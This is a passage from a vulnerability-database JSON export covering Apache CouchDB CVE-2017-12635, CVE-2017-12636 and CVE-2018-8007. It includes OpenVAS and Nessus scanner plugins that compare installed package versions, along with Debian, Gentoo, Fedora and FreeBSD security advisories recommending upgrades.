License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873882\");\n script_version(\"$Revision: 8085 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-12 11:25:30 +0100 (Tue, 12 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-10 08:10:53 +0100 (Sun, 10 Dec 2017)\");\n script_cve_id(\"CVE-2017-12635\", \"CVE-2017-12636\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for couchdb FEDORA-2017-a20d92573b\");\n script_tag(name: \"summary\", value: \"Check the version of couchdb\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help \nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Apache CouchDB is a distributed, \nfault-tolerant and schema-free document-oriented database accessible via a RESTful \nHTTP/JSON API. Among other features, it provides robust, incremental replication\nwith bi-directional conflict detection and resolution, and is queryable and \nindexable using a table-oriented view engine with JavaScript acting as the \ndefault view definition language.\");\n script_tag(name: \"affected\", value: \"couchdb on Fedora 27\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"FEDORA\", value: \"2017-a20d92573b\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5RYHD7TC6RJN4HYWPEQTSB3WTFKR56AC\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"couchdb\", rpm:\"couchdb~1.7.1~3.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:42:05", "references": ["https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/", "https://justi.cz/security/2017/11/14/couchdb-rce-npm.html"], "pluginID": "1361412562310107258", "description": "This host is installed with Apache CouchDB and is prone to multiple vulnerabilities.", "edition": 7, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-11-16T00:00:00", "title": "CouchDB Multiple Vulnerabilities (Linux)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2018-04-18T00:00:00", "id": "OPENVAS:1361412562310107258", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107258", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_couchdb_207_rce_vuln_lin.nasl 9523 2018-04-18 21:57:48Z asteins $\n#\n# CouchDB Multiple Vulnerabilities (Linux)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:couchdb\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107258\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 9523 $\");\n\n script_name(\"CouchDB Multiple Vulnerabilities (Linux)\");\n\n script_cve_id(\"CVE-2017-12635\", \"CVE-2017-12636\");\n script_xref(name:\"URL\", value:\"https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/\");\n script_xref(name:\"URL\", value:\"https://justi.cz/security/2017/11/14/couchdb-rce-npm.html\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-18 23:57:48 +0200 (Wed, 18 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-16 11:20:26 +0700 (Thu, 16 Nov 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_couchdb_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 5984);\n script_mandatory_keys(\"couchdb/installed\", \"Host/runs_unixoide\");\n\n script_tag(name: \"summary\", value: \"This host is installed with Apache CouchDB and is prone to multiple vulnerabilities.\");\n script_tag(name: \"vuldetect\", value: \"Checks the version\");\n script_tag(name: \"solution\", value: \"Upgrade to version 1.7.0 or 2.1.1 or later.\");\n script_tag(name: \"insight\", value: \"The vulnerabilities are due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser.\");\n script_tag(name: \"affected\", value: \"CouchDB Versions before 1.7.0 and 2.1.1.\");\n\n script_tag(name: \"impact\", value: \"These vulnerabilities can be used to give non-admin users access to arbitrary shell commands on the server as the database system user.\n\n Impact Level: Application\");\n\n script_tag(name:\"solution_type\", value: \"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe:CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version =~ \"^1\\.\")\n{\n if (version_is_less(version: version, test_version: \"1.7.0\"))\n {\n fix = \"1.7.0\";\n VULN = TRUE;\n }\n}\n\nelse if (version =~ \"^2\\.\")\n{\n if (version_is_less(version: version, test_version: \"2.1.1\"))\n {\n fix = \"2.1.1\";\n VULN = TRUE;\n }\n}\n\nif (VULN)\n{\n report = report_fixed_ver(installed_version: version, fixed_version: fix);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:13:52", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "7", "packageVersion": "1.2.0-5+deb7u1", "arch": "all", "packageFilename": "couchdb_1.2.0-5+deb7u1_all.deb", "packageName": "couchdb", "operator": "lt"}], "description": "Package : couchdb\nVersion : 1.2.0-5+deb7u1\nCVE ID : CVE-2017-12635 CVE-2017-12636\n\n\nCVE-2017-12635\n Prevent non-admin users to give themselves admin privileges.\n\nCVE-2017-12636\n Blacklist some configuration options to prevent execution of\n arbitrary shell commands as the CouchDB user\n\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1.2.0-5+deb7u1.\n\nWe recommend that you upgrade your couchdb packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "reporter": "Debian", "published": "2018-01-21T18:25:32", "title": "[SECURITY] [DLA 1252-1] couchdb security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:13:52", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2018-01-21T18:25:32", "id": "DEBIAN:DLA-1252-1:853FC", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201801/msg00026.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:44:33", "references": ["https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html", "https://packages.debian.org/source/wheezy/couchdb"], "pluginID": "106208", "description": "CVE-2017-12635 Prevent non-admin users to give themselves admin privileges.\n\nCVE-2017-12636 Blacklist some configuration options to prevent execution of arbitrary shell commands as the CouchDB user\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.2.0-5+deb7u1.\n\nWe recommend that you upgrade your couchdb packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 7, "reporter": "Tenable", "published": "2018-01-22T00:00:00", "title": "Debian DLA-1252-1 : couchdb security update", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2018-07-13T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:couchdb"], "id": "DEBIAN_DLA-1252.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=106208", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1252-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106208);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/07/13 15:08:46\");\n\n script_cve_id(\"CVE-2017-12635\", \"CVE-2017-12636\");\n\n script_name(english:\"Debian DLA-1252-1 : couchdb security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2017-12635 Prevent non-admin users to give themselves admin\nprivileges.\n\nCVE-2017-12636 Blacklist some configuration options to prevent\nexecution of arbitrary shell commands as the CouchDB user\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.2.0-5+deb7u1.\n\nWe recommend that you upgrade your couchdb packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/couchdb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected couchdb package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache CouchDB Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:couchdb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"couchdb\", reference:\"1.2.0-5+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:06:28", "references": ["https://security.gentoo.org/glsa/201711-16"], "pluginID": "104697", "description": "The remote host is affected by the vulnerability described in GLSA-201711-16 (CouchDB: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in CouchDB. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could execute arbitrary shell commands or escalate privileges.\n Workaround :\n\n There is no known workaround at this time.", "edition": 8, "reporter": "Tenable", "published": "2017-11-20T00:00:00", "title": "GLSA-201711-16 : CouchDB: Multiple vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2018-07-13T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:couchdb"], "id": "GENTOO_GLSA-201711-16.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=104697", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201711-16.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104697);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/07/13 15:08:46\");\n\n script_cve_id(\"CVE-2017-12635\", \"CVE-2017-12636\");\n script_xref(name:\"GLSA\", value:\"201711-16\");\n\n script_name(english:\"GLSA-201711-16 : CouchDB: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201711-16\n(CouchDB: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in CouchDB. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could execute arbitrary shell commands or escalate\n privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201711-16\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All CouchDB users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/couchdb-1.7.1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache CouchDB Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:couchdb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-db/couchdb\", unaffected:make_list(\"ge 1.7.1\"), vulnerable:make_list(\"lt 1.7.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"CouchDB\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:59:34", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-a20d92573b"], "pluginID": "105943", "description": "- CouchDB ver. 1.7.1\n\n - Fixed CVE-2017-12635\n\n - Fixed CVE-2017-12636\n\n - Switched to eunit for testing\n\n - Erlang 20 compatible\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 6, "reporter": "Tenable", "published": "2018-01-15T00:00:00", "title": "Fedora 27 : couchdb / erlang-jiffy (2017-a20d92573b)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2018-07-16T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:couchdb", "p-cpe:/a:fedoraproject:fedora:erlang-jiffy"], "id": "FEDORA_2017-A20D92573B.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=105943", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-a20d92573b.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105943);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/16 12:48:30\");\n\n script_cve_id(\"CVE-2017-12635\", \"CVE-2017-12636\");\n script_xref(name:\"FEDORA\", value:\"2017-a20d92573b\");\n\n script_name(english:\"Fedora 27 : couchdb / erlang-jiffy (2017-a20d92573b)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - CouchDB ver. 1.7.1\n\n - Fixed CVE-2017-12635\n\n - Fixed CVE-2017-12636\n\n - Switched to eunit for testing\n\n - Erlang 20 compatible\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-a20d92573b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected couchdb and / or erlang-jiffy packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache CouchDB Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:couchdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:erlang-jiffy\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"couchdb-1.7.1-3.fc27\")) flag++;\nif (rpm_check(release:\"FC27\", reference:\"erlang-jiffy-0.14.13-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"couchdb / erlang-jiffy\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:53:46", "references": ["https://blog.couchdb.org/2018/07/10/cve-2018-8007/", "http://www.nessus.org/u?236d3194", "http://www.nessus.org/u?f384bfb4", "http://www.nessus.org/u?aab45713"], "pluginID": "111018", "description": "Apache CouchDB PMC reports :\n\nDatabase Administrator could achieve privilege escalation to the account that CouchDB runs under, by abusing insufficient validation in the HTTP API, escaping security controls implemented in previous releases.", "edition": 5, "reporter": "Tenable", "published": "2018-07-12T00:00:00", "title": "FreeBSD : couchdb -- multiple vulnerabilities (1e54d140-8493-11e8-a795-0028f8d09152)", "type": "nessus", "enchantments": {"score": {"modified": "2018-09-01T23:53:46", "vector": "NONE", "value": 7.2}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8007", "CVE-2017-12635", "CVE-2017-12636"], "modified": "2018-08-22T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:couchdb"], "id": "FREEBSD_PKG_1E54D140849311E8A7950028F8D09152.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111018", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111018);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/08/22 13:59:43\");\n\n script_cve_id(\"CVE-2017-12635\", \"CVE-2017-12636\", \"CVE-2018-8007\");\n\n script_name(english:\"FreeBSD : couchdb -- multiple vulnerabilities (1e54d140-8493-11e8-a795-0028f8d09152)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Apache CouchDB PMC reports :\n\nDatabase Administrator could achieve privilege escalation to the\naccount that CouchDB runs under, by abusing insufficient validation in\nthe HTTP API, escaping security controls implemented in previous\nreleases.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blog.couchdb.org/2018/07/10/cve-2018-8007/\"\n );\n # https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?236d3194\"\n );\n # https://lists.apache.org/thread.html/6fa798e96686b7b0013ec2088140d00aeb7d34487d3f5ad032af6934@%3Cdev.couchdb.apache.org%3E\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?aab45713\"\n );\n # http://www.freebsd.org/ports/portaudit/1e54d140-8493-11e8-a795-0028f8d09152.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f384bfb4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 